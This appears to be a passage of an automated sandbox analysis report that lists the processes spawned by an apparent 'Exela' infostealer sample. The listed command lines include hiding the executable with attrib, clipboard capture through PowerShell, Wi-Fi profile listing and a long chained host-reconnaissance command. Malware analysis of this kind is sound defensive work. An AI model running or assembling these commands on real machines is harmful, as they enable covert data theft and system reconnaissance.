                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                  Start time:03:20:12
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                  Start time:03:20:12
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                  Start time:03:20:12
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                  Start time:03:20:13
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                  Imagebase:0x7ff792ef0000
                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                  Start time:03:20:13
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                  Imagebase:0x7ff73e070000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                  Start time:03:20:13
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                  Start time:03:20:13
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                  Start time:03:20:14
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff7e4960000
                                                                                                                                                                                                                                  File size:23'040 bytes
                                                                                                                                                                                                                                  MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                  Start time:03:20:14
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                  Start time:03:20:14
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                  Start time:03:20:14
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                  Imagebase:0x7ff792ef0000
                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:cmd.exe /c chcp
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:40
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                  Imagebase:0x7ff792ef0000
                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:chcp
                                                                                                                                                                                                                                  Imagebase:0x7ff694920000
                                                                                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:powershell.exe Get-Clipboard
                                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:cmd.exe /c chcp
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                                                  Start time:03:20:15
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:chcp
                                                                                                                                                                                                                                  Imagebase:0x7ff694920000
                                                                                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                                                  Start time:03:20:16
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                                                  Start time:03:20:16
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                                                  Start time:03:20:16
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                                                                  Start time:03:20:16
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:49
                                                                                                                                                                                                                                  Start time:03:20:16
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:systeminfo
                                                                                                                                                                                                                                  Imagebase:0x7ff6ddcc0000
                                                                                                                                                                                                                                  File size:110'080 bytes
                                                                                                                                                                                                                                  MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                                                  Start time:03:20:16
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:netsh wlan show profiles
                                                                                                                                                                                                                                  Imagebase:0x7ff6d3e40000
                                                                                                                                                                                                                                  File size:96'768 bytes
                                                                                                                                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                                                  Start time:03:20:16
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                  Imagebase:0x7ff717f30000
                                                                                                                                                                                                                                  File size:496'640 bytes
                                                                                                                                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                                                                  Start time:03:20:17
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\HOSTNAME.EXE
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:hostname
                                                                                                                                                                                                                                  Imagebase:0x7ff642700000
                                                                                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                                                                                  MD5 hash:33AFAA43B84BDEAB12E02F9DBD2B2EE0
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                                                                  Start time:03:20:17
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic logicaldisk get caption,description,providername
                                                                                                                                                                                                                                  Imagebase:0x7ff73e070000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                                                                  Start time:03:20:18
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:net user
                                                                                                                                                                                                                                  Imagebase:0x7ff6c8ac0000
                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:55
                                                                                                                                                                                                                                  Start time:03:20:18
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 user
                                                                                                                                                                                                                                  Imagebase:0x7ff6cb310000
                                                                                                                                                                                                                                  File size:183'808 bytes
                                                                                                                                                                                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

